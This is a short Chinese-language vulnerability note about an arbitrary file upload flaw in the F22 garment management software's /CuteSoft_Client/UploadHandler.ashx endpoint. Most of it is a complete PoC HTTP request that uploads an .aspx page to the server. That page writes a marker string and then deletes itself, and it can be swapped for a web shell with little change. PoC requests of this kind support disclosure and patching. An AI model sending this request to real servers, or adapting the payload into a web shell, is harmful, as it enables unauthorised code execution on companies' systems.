漏洞描述
F22服装管理软件系统是广州锦铭泰软件科技有限公司开发的一款专为服装行业开发的综合性管理软件。该产品旨在帮助服装企业实现全面、高效的管理,提升生产效率和经营效益。
F22服装管理软件系统 /CuteSoft_Client/UploadHandler.ashx 文件上传漏洞
PoC代码
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 531
Content-Type: multipart/form-data; boundary=----------zvcfhuanbolhjqotcijzyeqmfgrsiu
Cookie: ASP.NET_SessionId=20xkbmjih5yqp4u5ldl0n13f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
------------zvcfhuanbolhjqotcijzyeqmfgrsiu
Content-Disposition: form-data; name="folder"
/upload/udplog
------------zvcfhuanbolhjqotcijzyeqmfgrsiu
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream
<%@Page Language="C#"%> <% Response.Write("aamwodfsgyaovsfmnslt"); System.IO.File.Delete(Request.PhysicalPath); %>
------------zvcfhuanbolhjqotcijzyeqmfgrsiu
Content-Disposition: form-data; name="Upload"
Submit Query
------------zvcfhuanbolhjqotcijzyeqmfgrsiu--